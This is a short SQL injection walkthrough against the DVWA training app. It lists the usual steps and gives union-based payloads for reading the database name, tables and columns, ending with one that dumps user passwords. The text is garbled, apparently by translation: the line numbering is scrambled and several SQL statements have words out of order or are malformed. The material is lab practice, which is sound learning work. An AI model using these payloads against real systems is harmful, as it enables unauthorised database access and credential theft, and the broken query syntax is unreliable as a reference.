Implantation step
- Get the injection point and the resulting character is closed
- Determine the type of database
- Guess the number of columns, to get bit display
- Obtain basic information (such as: database name, database version, the current database name, etc.)
- Get the database name
- Get table name
- Get the column name
- Get the column values
. 1 . 1 ' Order by. 3 - - Error
2 . 1 ' Order by. 1 - - right
. 3 . 1 ' Order by 2 - - right (determined a few columns, where there are two)
. 4 . 5 . 6 . 1 ' Union select 1,2 - - (see echo bit) . 7 . 8 . 1 ' Union SELECT User (), database () - - (see library name) . 9 . 1 ' Union table_name SELECT, WHERE TABLE_SCHEMA = 2 from information_schema.tables Database () - - (see table) 10 . 1 ' Union column_name SELECT, WHERE from information_schema.columns 2 from table_name = ' Users
' - - (see the column name)
. 11 . 1 ' Union group_concat SELECT (column_name), from information_schema.columns from 2 WHERE table_name = ' Users ' - - (group_concat allows viewing data on one line only)
12 is -> DVWA Database the users data table has the following columns:
13 is user_id, FIRST_NAME, last_name, User, password, Avatar, LAST_LOGIN, failed_login
14 ----------------------- -------------------------------------------------- - access to the database structure.
15 16 . 1 ' Union SELECT. 1, GROUP_CONCAT (password) from Users - -